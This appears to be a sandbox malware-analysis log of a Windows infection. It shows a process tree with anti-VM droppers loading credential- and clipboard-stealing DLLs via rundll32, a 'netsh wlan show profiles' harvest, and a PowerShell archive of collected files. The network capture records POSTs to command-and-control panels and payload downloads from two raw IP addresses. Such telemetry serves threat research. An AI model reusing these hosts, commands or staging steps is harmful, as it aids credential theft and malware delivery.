C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"1⤵PID:3568
-
C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exeC:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:3068 -
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\cred64.dll, Main2⤵
- Loads dropped DLL
PID:1712 -
C:\Windows\system32\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\cred64.dll, Main3⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:4968 -
C:\Windows\system32\netsh.exenetsh wlan show profiles4⤵PID:2484
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\906287020291_Desktop.zip' -CompressionLevel Optimal4⤵
- Suspicious behavior: EnumeratesProcesses
PID:3520
-
-
-
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\clip64.dll, Main2⤵
- Blocklisted process makes network request
- Loads dropped DLL
PID:1044
-
-
C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exeC:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:2484
-
C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exeC:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:3428
Network
-
Remote address:8.8.8.8:53Requestg.bing.comIN AResponseg.bing.comIN CNAMEg-bing-com.dual-a-0034.a-msedge.netg-bing-com.dual-a-0034.a-msedge.netIN CNAMEdual-a-0034.a-msedge.netdual-a-0034.a-msedge.netIN A204.79.197.237dual-a-0034.a-msedge.netIN A13.107.21.237
-
GEThttps://g.bing.com/neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8DEiB3BpqH80lQh3h0OFLSTVUCUyVIwR3suggEvtxpKmgPP_bHpttlnvEz61mrVmr1xSwB0-b5US2mU9qDwBonDPEu9q2_1jXrkqdtEGpIX6v8P-8cmDswVn0v6l1XjkZvLXozNK4LKciaAPuaY3neL6kwH5awU2eF1xRwzy2WLBNgzPx%26u%3DbXN4Ym94JTNhJTJmJTJmZ2FtZSUyZiUzZnByb2R1Y3RJZCUzZDlOMEg2MktaM0JYViUyNm9jaWQlM2RpbnBfcm1jX3hib19zdGFydF9UUHRpdGxlX2VuZ2FnZQ%26rlid%3D03f3332a0a201c1abc345501a3f8558e&TIME=20240426T131952Z&CID=530628298&EID=530628298&tids=15000&adUnitId=11730597&localId=w:465F5D2A-B062-9966-D2D4-950980DD8E0E&deviceId=6966564702272893&muid=465F5D2AB0629966D2D4950980DD8E0ERemote address:204.79.197.237:443RequestGET /neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8DEiB3BpqH80lQh3h0OFLSTVUCUyVIwR3suggEvtxpKmgPP_bHpttlnvEz61mrVmr1xSwB0-b5US2mU9qDwBonDPEu9q2_1jXrkqdtEGpIX6v8P-8cmDswVn0v6l1XjkZvLXozNK4LKciaAPuaY3neL6kwH5awU2eF1xRwzy2WLBNgzPx%26u%3DbXN4Ym94JTNhJTJmJTJmZ2FtZSUyZiUzZnByb2R1Y3RJZCUzZDlOMEg2MktaM0JYViUyNm9jaWQlM2RpbnBfcm1jX3hib19zdGFydF9UUHRpdGxlX2VuZ2FnZQ%26rlid%3D03f3332a0a201c1abc345501a3f8558e&TIME=20240426T131952Z&CID=530628298&EID=530628298&tids=15000&adUnitId=11730597&localId=w:465F5D2A-B062-9966-D2D4-950980DD8E0E&deviceId=6966564702272893&muid=465F5D2AB0629966D2D4950980DD8E0E HTTP/2.0
host: g.bing.com
accept-encoding: gzip, deflate
user-agent: WindowsShellClient/9.0.40929.0 (Windows)
ResponseHTTP/2.0 204
pragma: no-cache
expires: Fri, 01 Jan 1990 00:00:00 GMT
set-cookie: MUID=39284F0CA7EB6DE029235B62A60B6CFA; domain=.bing.com; expires=Thu, 22-May-2025 17:07:29 GMT; path=/; SameSite=None; Secure; Priority=High;
strict-transport-security: max-age=31536000; includeSubDomains; preload
access-control-allow-origin: *
x-cache: CONFIG_NOCACHE
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 693888A47EF44E92B03D25D90D7D9BF1 Ref B: LON04EDGE1212 Ref C: 2024-04-27T17:07:29Z
date: Sat, 27 Apr 2024 17:07:29 GMT
-
GEThttps://g.bing.com/neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8DEiB3BpqH80lQh3h0OFLSTVUCUyVIwR3suggEvtxpKmgPP_bHpttlnvEz61mrVmr1xSwB0-b5US2mU9qDwBonDPEu9q2_1jXrkqdtEGpIX6v8P-8cmDswVn0v6l1XjkZvLXozNK4LKciaAPuaY3neL6kwH5awU2eF1xRwzy2WLBNgzPx%26u%3DbXN4Ym94JTNhJTJmJTJmZ2FtZSUyZiUzZnByb2R1Y3RJZCUzZDlOMEg2MktaM0JYViUyNm9jaWQlM2RpbnBfcm1jX3hib19zdGFydF9UUHRpdGxlX2VuZ2FnZQ%26rlid%3D03f3332a0a201c1abc345501a3f8558e&TIME=20240426T131952Z&CID=530628298&EID=&tids=15000&adUnitId=11730597&localId=w:465F5D2A-B062-9966-D2D4-950980DD8E0E&deviceId=6966564702272893&muid=465F5D2AB0629966D2D4950980DD8E0ERemote address:204.79.197.237:443RequestGET /neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8DEiB3BpqH80lQh3h0OFLSTVUCUyVIwR3suggEvtxpKmgPP_bHpttlnvEz61mrVmr1xSwB0-b5US2mU9qDwBonDPEu9q2_1jXrkqdtEGpIX6v8P-8cmDswVn0v6l1XjkZvLXozNK4LKciaAPuaY3neL6kwH5awU2eF1xRwzy2WLBNgzPx%26u%3DbXN4Ym94JTNhJTJmJTJmZ2FtZSUyZiUzZnByb2R1Y3RJZCUzZDlOMEg2MktaM0JYViUyNm9jaWQlM2RpbnBfcm1jX3hib19zdGFydF9UUHRpdGxlX2VuZ2FnZQ%26rlid%3D03f3332a0a201c1abc345501a3f8558e&TIME=20240426T131952Z&CID=530628298&EID=&tids=15000&adUnitId=11730597&localId=w:465F5D2A-B062-9966-D2D4-950980DD8E0E&deviceId=6966564702272893&muid=465F5D2AB0629966D2D4950980DD8E0E HTTP/2.0
host: g.bing.com
accept-encoding: gzip, deflate
user-agent: WindowsShellClient/9.0.40929.0 (Windows)
cookie: MUID=39284F0CA7EB6DE029235B62A60B6CFA; _EDGE_S=SID=0CCD0984AA79622819C61DEAABFA6312
ResponseHTTP/2.0 204
pragma: no-cache
expires: Fri, 01 Jan 1990 00:00:00 GMT
set-cookie: MSPTC=5kAXrMywdhLn16yyUT0Rj-ACdIrO-_FBZkgY3G-ae6E; domain=.bing.com; expires=Thu, 22-May-2025 17:07:30 GMT; path=/; Partitioned; secure; SameSite=None
strict-transport-security: max-age=31536000; includeSubDomains; preload
access-control-allow-origin: *
x-cache: CONFIG_NOCACHE
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 9D807B57F5A04C778A641BE2280068F6 Ref B: LON04EDGE1212 Ref C: 2024-04-27T17:07:30Z
date: Sat, 27 Apr 2024 17:07:30 GMT
-
GEThttps://www.bing.com/aes/c.gif?RG=a7a89982c8dd4b0786daab865ebdfa30&med=10&pubId=251978541&tids=15000&type=mv&reqver=1.0&TIME=20240426T131952Z&adUnitId=11730597&localId=w:465F5D2A-B062-9966-D2D4-950980DD8E0E&deviceId=6966564702272893Remote address:23.62.61.194:443RequestGET /aes/c.gif?RG=a7a89982c8dd4b0786daab865ebdfa30&med=10&pubId=251978541&tids=15000&type=mv&reqver=1.0&TIME=20240426T131952Z&adUnitId=11730597&localId=w:465F5D2A-B062-9966-D2D4-950980DD8E0E&deviceId=6966564702272893 HTTP/2.0
host: www.bing.com
accept-encoding: gzip, deflate
user-agent: WindowsShellClient/9.0.40929.0 (Windows)
cookie: MUID=39284F0CA7EB6DE029235B62A60B6CFA
ResponseHTTP/2.0 200
pragma: no-cache
vary: Origin
p3p: CP=BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 350BA4A5571A486D803814C7B9FBA84B Ref B: AMS04EDGE2718 Ref C: 2024-04-27T17:07:30Z
content-length: 0
date: Sat, 27 Apr 2024 17:07:30 GMT
set-cookie: _EDGE_S=SID=0CCD0984AA79622819C61DEAABFA6312; path=/; httponly; domain=bing.com
set-cookie: MUIDB=39284F0CA7EB6DE029235B62A60B6CFA; path=/; httponly; expires=Thu, 22-May-2025 17:07:30 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.be3d3e17.1714237650.112e0ca5
-
Remote address:8.8.8.8:53Request8.8.8.8.in-addr.arpaIN PTRResponse8.8.8.8.in-addr.arpaIN PTRdnsgoogle
-
Remote address:8.8.8.8:53Request237.197.79.204.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request73.159.190.20.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request240.221.184.93.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request95.221.229.192.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request194.61.62.23.in-addr.arpaIN PTRResponse194.61.62.23.in-addr.arpaIN PTRa23-62-61-194deploystaticakamaitechnologiescom
-
Remote address:193.233.132.139:80RequestPOST /sev56rkm/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.139
Content-Length: 4
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Sat, 27 Apr 2024 17:07:32 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Refresh: 0; url = Login.php
-
Remote address:193.233.132.139:80RequestPOST /sev56rkm/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.139
Content-Length: 158
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Sat, 27 Apr 2024 17:07:32 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:193.233.132.139:80RequestPOST /sev56rkm/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.139
Content-Length: 31
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Sat, 27 Apr 2024 17:07:34 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:193.233.132.139:80RequestPOST /sev56rkm/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.139
Content-Length: 31
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Sat, 27 Apr 2024 17:07:36 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:193.233.132.139:80RequestPOST /sev56rkm/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.139
Content-Length: 31
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Sat, 27 Apr 2024 17:07:38 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:193.233.132.139:80RequestPOST /sev56rkm/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.139
Content-Length: 31
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Sat, 27 Apr 2024 17:07:41 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:193.233.132.167:80RequestGET /cost/sarra.exe HTTP/1.1
Host: 193.233.132.167
ResponseHTTP/1.1 200 OK
Date: Sat, 27 Apr 2024 17:07:32 GMT
Content-Type: application/octet-stream
Content-Length: 2374144
Last-Modified: Sat, 27 Apr 2024 15:51:14 GMT
Connection: keep-alive
ETag: "662d1ef2-243a00"
Accept-Ranges: bytes
-
Remote address:193.233.132.167:80RequestGET /mine/amert.exe HTTP/1.1
Host: 193.233.132.167
ResponseHTTP/1.1 200 OK
Date: Sat, 27 Apr 2024 17:07:34 GMT
Content-Type: application/octet-stream
Content-Length: 1895424
Last-Modified: Sat, 27 Apr 2024 15:51:47 GMT
Connection: keep-alive
ETag: "662d1f13-1cec00"
Accept-Ranges: bytes
-
Remote address:193.233.132.167:80RequestGET /mine/random.exe HTTP/1.1
Host: 193.233.132.167
ResponseHTTP/1.1 200 OK
Date: Sat, 27 Apr 2024 17:07:36 GMT
Content-Type: application/octet-stream
Content-Length: 1166336
Last-Modified: Sat, 27 Apr 2024 15:50:45 GMT
Connection: keep-alive
ETag: "662d1ed5-11cc00"
Accept-Ranges: bytes
-
Remote address:193.233.132.167:80RequestGET /cost/random.exe HTTP/1.1
Host: 193.233.132.167
ResponseHTTP/1.1 200 OK
Date: Sat, 27 Apr 2024 17:07:38 GMT
Content-Type: application/octet-stream
Content-Length: 2413056
Last-Modified: Sat, 27 Apr 2024 15:50:59 GMT
Connection: keep-alive
ETag: "662d1ee3-24d200"
Accept-Ranges: bytes
-
Remote address:8.8.8.8:53Request139.132.233.193.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request167.132.233.193.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Requestwww.youtube.comIN AResponsewww.youtube.comIN CNAMEyoutube-ui.l.google.comyoutube-ui.l.google.comIN A142.250.179.238youtube-ui.l.google.comIN A142.250.180.14youtube-ui.l.google.comIN A142.250.187.206youtube-ui.l.google.comIN A142.250.187.238youtube-ui.l.google.comIN A142.250.178.14youtube-ui.l.google.comIN A172.217.16.238youtube-ui.l.google.comIN A142.250.200.14youtube-ui.l.google.comIN A142.250.200.46youtube-ui.l.google.comIN A216.58.201.110youtube-ui.l.google.comIN A216.58.204.78youtube-ui.l.google.comIN A216.58.212.206
-
Remote address:142.250.179.238:443RequestGET /account HTTP/2.0
host: www.youtube.com
sec-ch-ua: "Chromium";v="110", "Not A(Brand";v="24", "Google Chrome";v="110"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
upgrade-insecure-requests: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
sec-ch-ua-arch: "x86"
sec-ch-ua-platform-version: "10.0.0"
sec-ch-ua-model: ""
sec-ch-ua-bitness: "64"
sec-ch-ua-wow64: ?0
sec-ch-ua-full-version-list: "Chromium";v="110.0.5481.104", "Not A(Brand";v="24.0.0.0", "Google Chrome";v="110.0.5481.104"
x-client-data: CJHdygE=
sec-fetch-site: none
sec-fetch-mode: navigate
sec-fetch-user: ?1
sec-fetch-dest: document
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
-
Remote address:8.8.8.8:53Requestaccounts.google.comIN AResponseaccounts.google.comIN A173.194.69.84
-
Remote address:8.8.8.8:53Request195.187.250.142.in-addr.arpaIN PTRResponse195.187.250.142.in-addr.arpaIN PTRlhr25s33-in-f31e100net
-
Remote address:8.8.8.8:53Request234.187.250.142.in-addr.arpaIN PTRResponse234.187.250.142.in-addr.arpaIN PTRlhr25s34-in-f101e100net
-
Remote address:8.8.8.8:53Request238.179.250.142.in-addr.arpaIN PTRResponse238.179.250.142.in-addr.arpaIN PTRlhr25s31-in-f141e100net
-
Remote address:8.8.8.8:53Requestcontent-autofill.googleapis.comIN AResponsecontent-autofill.googleapis.comIN A172.217.16.234content-autofill.googleapis.comIN A142.250.200.10content-autofill.googleapis.comIN A142.250.200.42content-autofill.googleapis.comIN A216.58.201.106content-autofill.googleapis.comIN A216.58.204.74content-autofill.googleapis.comIN A216.58.212.202content-autofill.googleapis.comIN A172.217.169.74content-autofill.googleapis.comIN A142.250.179.234content-autofill.googleapis.comIN A142.250.180.10content-autofill.googleapis.comIN A142.250.187.202content-autofill.googleapis.comIN A142.250.187.234content-autofill.googleapis.comIN A142.250.178.10
-
GEThttps://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTEwLjAuNTQ4MS4xMDQSHgmA6QC9dWevzxIFDRkBE_oSBQ3oIX6GEgUN05ioBw==?alt=protochrome.exeRemote address:172.217.16.234:443RequestGET /v1/pages/ChVDaHJvbWUvMTEwLjAuNTQ4MS4xMDQSHgmA6QC9dWevzxIFDRkBE_oSBQ3oIX6GEgUN05ioBw==?alt=proto HTTP/2.0
host: content-autofill.googleapis.com
x-goog-encode-response-if-executable: base64
x-goog-api-key: AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw
x-client-data: CJHdygE=
sec-fetch-site: none
sec-fetch-mode: no-cors
sec-fetch-dest: empty
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
-
Remote address:8.8.8.8:53Requestaccounts.youtube.comIN AResponseaccounts.youtube.comIN CNAMEwww3.l.google.comwww3.l.google.comIN A172.217.16.238
-
Remote address:8.8.8.8:53Request84.69.194.173.in-addr.arpaIN PTRResponse84.69.194.173.in-addr.arpaIN PTRef-in-f841e100net
-
Remote address:8.8.8.8:53Request3.180.250.142.in-addr.arpaIN PTRResponse3.180.250.142.in-addr.arpaIN PTRlhr25s32-in-f31e100net
-
Remote address:8.8.8.8:53Request227.212.58.216.in-addr.arpaIN PTRResponse227.212.58.216.in-addr.arpaIN PTRlhr25s28-in-f31e100net227.212.58.216.in-addr.arpaIN PTRams16s22-in-f3�H227.212.58.216.in-addr.arpaIN PTRams16s22-in-f227�H
-
Remote address:8.8.8.8:53Request234.16.217.172.in-addr.arpaIN PTRResponse234.16.217.172.in-addr.arpaIN PTRlhr48s28-in-f101e100net234.16.217.172.in-addr.arpaIN PTRmad08s04-in-f10�I
-
GEThttps://accounts.youtube.com/accounts/CheckConnection?pmpo=https%3A%2F%2Faccounts.google.com&v=1201792650×tamp=1714237659684chrome.exeRemote address:172.217.16.238:443RequestGET /accounts/CheckConnection?pmpo=https%3A%2F%2Faccounts.google.com&v=1201792650×tamp=1714237659684 HTTP/2.0
host: accounts.youtube.com
sec-ch-ua: "Chromium";v="110", "Not A(Brand";v="24", "Google Chrome";v="110"
sec-ch-ua-mobile: ?0
sec-ch-ua-full-version: "110.0.5481.104"
sec-ch-ua-arch: "x86"
sec-ch-ua-platform: "Windows"
sec-ch-ua-platform-version: "10.0.0"
sec-ch-ua-model: ""
sec-ch-ua-bitness: "64"
sec-ch-ua-wow64: ?0
sec-ch-ua-full-version-list: "Chromium";v="110.0.5481.104", "Not A(Brand";v="24.0.0.0", "Google Chrome";v="110.0.5481.104"
upgrade-insecure-requests: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
x-client-data: CJHdygE=
sec-fetch-site: cross-site
sec-fetch-mode: navigate
sec-fetch-dest: iframe
referer: https://accounts.google.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: YSC=YS5PzM7dWFk
cookie: VISITOR_INFO1_LIVE=dZ-UnFWGjCk
cookie: VISITOR_PRIVACY_METADATA=CgJVUxIEGgAgLQ%3D%3D
-
GEThttps://clients2.google.com/service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=110.0.5481.104&lang=en-US&acceptformat=crx3&x=id%3Dghbmnnjooekpmoecnnnilnnbdlolhkhi%26v%3D1.76.1%26installsource%3Dnotfromwebstore%26installedby%3Dexternal%26uc%26ping%3Dr%253D1%2526e%253D1&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D1.0.0.6%26installsource%3Dnotfromwebstore%26installedby%3Dother%26uc%26ping%3Dr%253D1%2526e%253D1chrome.exeRemote address:172.217.16.238:443RequestGET /service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=110.0.5481.104&lang=en-US&acceptformat=crx3&x=id%3Dghbmnnjooekpmoecnnnilnnbdlolhkhi%26v%3D1.76.1%26installsource%3Dnotfromwebstore%26installedby%3Dexternal%26uc%26ping%3Dr%253D1%2526e%253D1&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D1.0.0.6%26installsource%3Dnotfromwebstore%26installedby%3Dother%26uc%26ping%3Dr%253D1%2526e%253D1 HTTP/2.0
host: clients2.google.com
sec-fetch-site: none
sec-fetch-mode: no-cors
sec-fetch-dest: empty
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
-
Remote address:8.8.8.8:53Requestwww.google.comIN AResponsewww.google.comIN A142.250.178.4
-
Remote address:8.8.8.8:53Request238.16.217.172.in-addr.arpaIN PTRResponse238.16.217.172.in-addr.arpaIN PTRlhr48s28-in-f141e100net238.16.217.172.in-addr.arpaIN PTRmad08s04-in-f14�I
-
Remote address:8.8.8.8:53Request4.178.250.142.in-addr.arpaIN PTRResponse4.178.250.142.in-addr.arpaIN PTRlhr48s27-in-f41e100net
-
Remote address:8.8.8.8:53Requestclients2.google.comIN AResponseclients2.google.comIN CNAMEclients.l.google.comclients.l.google.comIN A172.217.16.238
-
Remote address:8.8.8.8:53Requestplay.google.comIN AResponseplay.google.comIN A142.250.187.206
-
Remote address:142.250.187.206:443RequestOPTIONS /log?format=json&hasfast=true&authuser=0 HTTP/2.0
host: play.google.com
accept: */*
access-control-request-method: POST
access-control-request-headers: x-goog-authuser
origin: https://accounts.google.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
sec-fetch-mode: cors
sec-fetch-site: same-site
sec-fetch-dest: empty
referer: https://accounts.google.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
-
Remote address:8.8.8.8:53Request206.187.250.142.in-addr.arpaIN PTRResponse206.187.250.142.in-addr.arpaIN PTRlhr25s33-in-f141e100net
-
Remote address:8.8.8.8:53Request86.23.85.13.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request56.126.166.20.in-addr.arpaIN PTRResponse
-
Remote address:193.233.132.167:80RequestPOST /enigma/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.167
Content-Length: 4
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Sat, 27 Apr 2024 17:08:02 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:193.233.132.167:80RequestPOST /enigma/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.167
Content-Length: 158
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Sat, 27 Apr 2024 17:08:02 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:193.233.132.167:80RequestGET /enigma/Plugins/cred64.dll HTTP/1.1
Host: 193.233.132.167
ResponseHTTP/1.1 200 OK
Date: Sat, 27 Apr 2024 17:08:12 GMT
Content-Type: application/octet-stream
Content-Length: 1285632
Last-Modified: Thu, 01 Feb 2024 16:00:36 GMT
Connection: keep-alive
ETag: "65bbc024-139e00"
Accept-Ranges: bytes
-
Remote address:193.233.132.167:80RequestGET /enigma/Plugins/clip64.dll HTTP/1.1
Host: 193.233.132.167
ResponseHTTP/1.1 200 OK
Date: Sat, 27 Apr 2024 17:08:23 GMT
Content-Type: application/octet-stream
Content-Length: 112128
Last-Modified: Thu, 01 Feb 2024 16:00:35 GMT
Connection: keep-alive
ETag: "65bbc023-1b600"
Accept-Ranges: bytes
-
Remote address:8.8.8.8:53Request17.14.97.104.in-addr.arpaIN PTRResponse17.14.97.104.in-addr.arpaIN PTRa104-97-14-17deploystaticakamaitechnologiescom
-
Remote address:193.233.132.167:80RequestPOST /enigma/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.167
Content-Length: 21
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Sat, 27 Apr 2024 17:08:14 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Refresh: 0; url = Login.php
-
Remote address:193.233.132.167:80RequestPOST /enigma/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.167
Content-Length: 5
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Sat, 27 Apr 2024 17:08:24 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:8.8.8.8:53Request249.197.17.2.in-addr.arpaIN PTRResponse249.197.17.2.in-addr.arpaIN PTRa2-17-197-249deploystaticakamaitechnologiescom
-
Remote address:8.8.8.8:53Requestbeacons.gcp.gvt2.comIN AResponsebeacons.gcp.gvt2.comIN CNAMEbeacons-handoff.gcp.gvt2.combeacons-handoff.gcp.gvt2.comIN A192.178.49.163
-
Remote address:192.178.49.163:443RequestPOST /domainreliability/upload HTTP/2.0
host: beacons.gcp.gvt2.com
content-length: 300
content-type: application/json; charset=utf-8
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
access-control-allow-methods: POST
access-control-allow-origin: *
date: Sat, 27 Apr 2024 17:09:43 GMT
content-type: text/html
content-type: text/html
access-control-allow-headers: Content-Type
access-control-allow-methods: POST
access-control-allow-origin: *
content-type: text/html
-
Remote address:192.178.49.163:443RequestOPTIONS /domainreliability/upload-nel HTTP/2.0
host: beacons.gcp.gvt2.com
origin: https://accounts.google.com
access-control-request-method: POST
access-control-request-headers: content-type
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
access-control-allow-methods: POST
access-control-allow-origin: *
date: Sat, 27 Apr 2024 17:09:43 GMT
content-type: text/html
content-type: text/html
access-control-allow-headers: Content-Type
access-control-allow-methods: POST
access-control-allow-origin: *
content-type: text/html
-
Remote address:192.178.49.163:443RequestPOST /domainreliability/upload-nel HTTP/2.0
host: beacons.gcp.gvt2.com
content-length: 405
content-type: application/reports+json
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
-
Remote address:8.8.8.8:53Request163.49.178.192.in-addr.arpaIN PTRResponse163.49.178.192.in-addr.arpaIN PTRphx19s05-in-f31e100net
-
Remote address:8.8.8.8:53Request48.229.111.52.in-addr.arpaIN PTRResponse
-
